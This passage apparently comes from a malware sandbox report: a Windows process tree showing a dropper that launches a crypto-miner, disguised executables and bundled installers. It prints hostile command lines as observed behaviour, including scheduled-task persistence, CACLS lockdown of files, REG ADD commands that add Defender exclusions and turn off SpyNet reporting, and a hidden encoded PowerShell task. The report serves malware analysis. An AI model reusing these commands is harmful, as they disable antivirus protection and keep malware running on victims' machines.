        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:4140
    - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\5hh0pO3.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\5hh0pO3.exe
        5⤵
        
        PID:7592
      - C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
        6⤵
        
        PID:1580
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
        7⤵
        Creates scheduled task(s)
        
        PID:6328
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
        7⤵
        
        PID:8212
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        8⤵
        
        PID:9036
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:N"
        8⤵
        
        PID:6440
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:R" /E
        8⤵
        
        PID:7332
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        8⤵
        
        PID:6264
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        8⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:R" /E
        8⤵
        
        PID:3672
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
        7⤵
        
        PID:6592
  - - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\6sX7du6.exe
      C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\6sX7du6.exe
      4⤵
      PID:5472
- - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\7kf3Fn67.exe
    C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\7kf3Fn67.exe
    3⤵
    PID:6424
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A7BF.tmp\A7C0.tmp\A7C1.bat C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\7kf3Fn67.exe"
      4⤵
      PID:4008
- C:\Users\Admin\AppData\Local\Temp\a\Veeam.Backup.Service.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Veeam.Backup.Service.exe"
  2⤵
  PID:1428
- C:\Users\Admin\AppData\Local\Temp\a\shareu.exe
  "C:\Users\Admin\AppData\Local\Temp\a\shareu.exe"
  2⤵
  PID:5364
- C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
  2⤵
  PID:5632
- C:\Users\Admin\AppData\Local\Temp\a\WatchDog.exe
  "C:\Users\Admin\AppData\Local\Temp\a\WatchDog.exe"
  2⤵
  PID:5796
- C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
  2⤵
  PID:6128
- - C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
    3⤵
    PID:8012
- - C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
    3⤵
    PID:8084
- - C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
    3⤵
    PID:8164
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "IMAP Service" /xml "C:\Users\Admin\AppData\Local\Temp\tmp7296.tmp"
      4⤵
      Creates scheduled task(s)
      PID:3048
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "IMAP Service Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9B9B.tmp"
      4⤵
      Creates scheduled task(s)
      PID:7664
- C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe"
  2⤵
  PID:808
- - C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\damianozx.exe"
    3⤵
    PID:6928
- C:\Users\Admin\AppData\Local\Temp\a\ch.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ch.exe"
  2⤵
  PID:5736
- C:\Users\Admin\AppData\Local\Temp\a\Random.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Random.exe"
  2⤵
  PID:6076
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:5272
  - - C:\Users\Admin\Pictures\n9oqrEMeCYDbP5lT5pHk3Go8.exe
      "C:\Users\Admin\Pictures\n9oqrEMeCYDbP5lT5pHk3Go8.exe"
      4⤵
      PID:4196
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c hing.bat
        5⤵
        
        PID:6188
    - - C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\1powerreduceproie.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\1powerreduceproie.exe
        5⤵
        
        PID:8988
      - C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\1powerreducepro.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP018.TMP\1powerreducepro.exe
        6⤵
        
        PID:9112
        
        C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\powerreduce.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP019.TMP\powerreduce.exe
        7⤵
        
        PID:360
  - - C:\Users\Admin\Pictures\yZcplMW9zYciItddg9zCgNQX.exe
      "C:\Users\Admin\Pictures\yZcplMW9zYciItddg9zCgNQX.exe"
      4⤵
      PID:688
    - - C:\Users\Admin\Pictures\yZcplMW9zYciItddg9zCgNQX.exe
        
        "C:\Users\Admin\Pictures\yZcplMW9zYciItddg9zCgNQX.exe"
        5⤵
        
        PID:7012
  - - C:\Users\Admin\Pictures\fDnI9AjFZE2WZENg58YhUaMM.exe
      "C:\Users\Admin\Pictures\fDnI9AjFZE2WZENg58YhUaMM.exe"
      4⤵
      PID:6432
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:8664
    - - C:\Users\Admin\Pictures\fDnI9AjFZE2WZENg58YhUaMM.exe
        
        "C:\Users\Admin\Pictures\fDnI9AjFZE2WZENg58YhUaMM.exe"
        5⤵
        
        PID:8788
  - - C:\Users\Admin\Pictures\Y7EMPDRll5xSyhrKsDp8qwbW.exe
      "C:\Users\Admin\Pictures\Y7EMPDRll5xSyhrKsDp8qwbW.exe"
      4⤵
      PID:6404
  - - C:\Users\Admin\Pictures\kQHioulRPhZaQbACXr9gjsus.exe
      "C:\Users\Admin\Pictures\kQHioulRPhZaQbACXr9gjsus.exe"
      4⤵
      PID:5224
  - - C:\Users\Admin\Pictures\tf9YZVInmohOZ15nUjtBP60Y.exe
      "C:\Users\Admin\Pictures\tf9YZVInmohOZ15nUjtBP60Y.exe"
      4⤵
      PID:4548
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:7568
    - - C:\Users\Admin\Pictures\tf9YZVInmohOZ15nUjtBP60Y.exe
        
        "C:\Users\Admin\Pictures\tf9YZVInmohOZ15nUjtBP60Y.exe"
        5⤵
        
        PID:2232
  - - C:\Users\Admin\Pictures\W3Xnt27iDvrfhoFPuXBBazDs.exe
      "C:\Users\Admin\Pictures\W3Xnt27iDvrfhoFPuXBBazDs.exe" --silent --allusers=0
      4⤵
      PID:6648
    - - C:\Users\Admin\Pictures\W3Xnt27iDvrfhoFPuXBBazDs.exe
        
        C:\Users\Admin\Pictures\W3Xnt27iDvrfhoFPuXBBazDs.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x69bb5648,0x69bb5658,0x69bb5664
        5⤵
        
        PID:6872
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\W3Xnt27iDvrfhoFPuXBBazDs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\W3Xnt27iDvrfhoFPuXBBazDs.exe" --version
        5⤵
        
        PID:7160
    - - C:\Users\Admin\Pictures\W3Xnt27iDvrfhoFPuXBBazDs.exe
        
        "C:\Users\Admin\Pictures\W3Xnt27iDvrfhoFPuXBBazDs.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=6648 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231026012301" --session-guid=92a61788-1500-4bc9-8045-478ee2589ef6 --server-tracking-blob=MzM0ZDVhZTU0YmI3OWUzNTNlNWFjZDIwNGQ1MmI5MmI3YzA2NWVkOWFhYzFjN2U1YjkwZjNjNGVhMmNhMDYyZjp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5ODI4MzM3Mi4zMDUyIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI1OWNmMDU0NS0yZThhLTRmNmQtOTUyYi0zZGNjMjRiYjNhNDUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5C04000000000000
        5⤵
        
        PID:2952
      - C:\Users\Admin\Pictures\W3Xnt27iDvrfhoFPuXBBazDs.exe
        
        C:\Users\Admin\Pictures\W3Xnt27iDvrfhoFPuXBBazDs.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2c8,0x2cc,0x2d0,0x298,0x2d4,0x69255648,0x69255658,0x69255664
        6⤵
        
        PID:6944
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310260123011\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310260123011\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
        5⤵
        
        PID:9060
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310260123011\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310260123011\assistant\assistant_installer.exe" --version
        5⤵
        
        PID:224
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310260123011\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310260123011\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x248,0x24c,0x250,0x224,0x258,0x3c1588,0x3c1598,0x3c15a4
        6⤵
        
        PID:7396
  - - C:\Users\Admin\Pictures\BChsHW8WuGhFJ5vCFFoURk9W.exe
      "C:\Users\Admin\Pictures\BChsHW8WuGhFJ5vCFFoURk9W.exe"
      4⤵
      PID:6816
- C:\Users\Admin\AppData\Local\Temp\a\Ads.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Ads.exe"
  2⤵
  PID:5792
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:5316
  - - C:\Users\Admin\Pictures\NMpcPi39spPUVGwtJ0ApmtfY.exe
      "C:\Users\Admin\Pictures\NMpcPi39spPUVGwtJ0ApmtfY.exe"
      4⤵
      PID:3196
    - - C:\Users\Admin\Pictures\NMpcPi39spPUVGwtJ0ApmtfY.exe
        
        "C:\Users\Admin\Pictures\NMpcPi39spPUVGwtJ0ApmtfY.exe"
        5⤵
        
        PID:4200
  - - C:\Users\Admin\Pictures\QR0bFN7xJyKpnCLctIyC0qGr.exe
      "C:\Users\Admin\Pictures\QR0bFN7xJyKpnCLctIyC0qGr.exe" --silent --allusers=0
      4⤵
      PID:6292
    - - C:\Users\Admin\Pictures\QR0bFN7xJyKpnCLctIyC0qGr.exe
        
        C:\Users\Admin\Pictures\QR0bFN7xJyKpnCLctIyC0qGr.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x688f5648,0x688f5658,0x688f5664
        5⤵
        
        PID:6696
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\QR0bFN7xJyKpnCLctIyC0qGr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\QR0bFN7xJyKpnCLctIyC0qGr.exe" --version
        5⤵
        
        PID:836
  - - C:\Users\Admin\Pictures\7YgijViVHIvO8BAULhNmniuK.exe
      "C:\Users\Admin\Pictures\7YgijViVHIvO8BAULhNmniuK.exe"
      4⤵
      PID:6924
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:7692
    - - C:\Users\Admin\Pictures\7YgijViVHIvO8BAULhNmniuK.exe
        
        "C:\Users\Admin\Pictures\7YgijViVHIvO8BAULhNmniuK.exe"
        5⤵
        
        PID:1852
  - - C:\Users\Admin\Pictures\n13FWA7glaPNw7pz3Y3dlOSr.exe
      "C:\Users\Admin\Pictures\n13FWA7glaPNw7pz3Y3dlOSr.exe"
      4⤵
      PID:7156
  - - C:\Users\Admin\Pictures\2fHoSGRzT8S5omHsKtQZsbyI.exe
      "C:\Users\Admin\Pictures\2fHoSGRzT8S5omHsKtQZsbyI.exe"
      4⤵
      PID:6636
  - - C:\Users\Admin\Pictures\VPFvKo5LKZ7G8wP0neLHj9tM.exe
      "C:\Users\Admin\Pictures\VPFvKo5LKZ7G8wP0neLHj9tM.exe"
      4⤵
      PID:1188
    - - C:\Users\Admin\AppData\Local\Temp\7zS4FFB.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:7872
      - C:\Users\Admin\AppData\Local\Temp\7zS63C1.tmp\Install.exe
        
        .\Install.exe /VibdidT "385118" /S
        6⤵
        
        PID:7252
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:8204
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:8200
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:8956
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:4580
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:7648
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:3844
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:2968
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gjDGkByat" /SC once /ST 00:32:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:3868
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gjDGkByat"
        7⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gjDGkByat"
        7⤵
        
        PID:4204
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bIuqmGYQGJDamXyoTV" /SC once /ST 01:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kBxxCRZNHvjAGpesg\GPTqPnNFuTbVPXl\dNJSJOS.exe\" gS /cIsite_idegA 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:9356
- C:\Users\Admin\AppData\Local\Temp\a\sogn.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"
  2⤵
  PID:5956
- - C:\Users\Admin\AppData\Local\Temp\a\sogn.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"
    3⤵
    PID:6828
- C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"
  2⤵
  PID:4320
- - C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"
    3⤵
    PID:6972
- C:\Users\Admin\AppData\Local\Temp\a\abun.exe
  "C:\Users\Admin\AppData\Local\Temp\a\abun.exe"
  2⤵
  PID:5536
- - C:\Users\Admin\AppData\Local\Temp\a\abun.exe
    "C:\Users\Admin\AppData\Local\Temp\a\abun.exe"
    3⤵
    PID:8864
- C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
  2⤵
  PID:5612
- - C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
    3⤵
    PID:7100
- - C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
    3⤵
    PID:6568
- C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe"
  2⤵
  PID:5756
- - C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
    C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
    3⤵
    PID:5340
- C:\Users\Admin\AppData\Local\Temp\a\PO.pdf.exe
  "C:\Users\Admin\AppData\Local\Temp\a\PO.pdf.exe"
  2⤵
  PID:5568
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"
    3⤵
    PID:6308
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"
      4⤵
      PID:2284
- C:\Users\Admin\AppData\Local\Temp\a\DH.exe
  "C:\Users\Admin\AppData\Local\Temp\a\DH.exe"
  2⤵
  PID:5512
- - C:\Users\Admin\AppData\Local\Temp\a\DH.exe
    "C:\Users\Admin\AppData\Local\Temp\a\DH.exe"
    3⤵
    PID:8776
- C:\Users\Admin\AppData\Local\Temp\a\raaa.exe
  "C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"
  2⤵
  PID:4560
- - C:\Users\Admin\AppData\Local\Temp\a\raaa.exe
    "C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"
    3⤵
    PID:8768
- C:\Users\Admin\AppData\Local\Temp\a\aao.exe
  "C:\Users\Admin\AppData\Local\Temp\a\aao.exe"
  2⤵
  PID:6888
- - C:\Users\Admin\AppData\Local\Temp\a\aao.exe
    "C:\Users\Admin\AppData\Local\Temp\a\aao.exe"
    3⤵
    PID:4496
- C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
  2⤵
  PID:6168
- - C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
    3⤵
    PID:7264
- - C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
    3⤵
    PID:6628
- C:\Users\Admin\AppData\Local\Temp\a\newrock.exe
  "C:\Users\Admin\AppData\Local\Temp\a\newrock.exe"
  2⤵
  PID:6836
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:7964
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:7420
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    PID:7564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5600
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      PID:1924
- C:\Users\Admin\AppData\Local\Temp\a\RBY2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\RBY2.exe"
  2⤵
  PID:1076
- - C:\Users\Admin\Pictures\Xczz1knPlOuUIQcsiUNkofol.exe
    "C:\Users\Admin\Pictures\Xczz1knPlOuUIQcsiUNkofol.exe"
    3⤵
    PID:8108
  - - C:\Users\Admin\AppData\Local\Temp\7zS7238.tmp\Install.exe
      .\Install.exe
      4⤵
      PID:8252
    - - C:\Users\Admin\AppData\Local\Temp\7zS8BFA.tmp\Install.exe
        
        .\Install.exe /NMdYdidsxuyv "385121" /S
        5⤵
        
        PID:9048
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:8096
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:8760
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:1184
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:4904
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:5348
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:4168
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:7976
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:5484
      - C:\Windows\SysWOW64\schtasks.exe
        
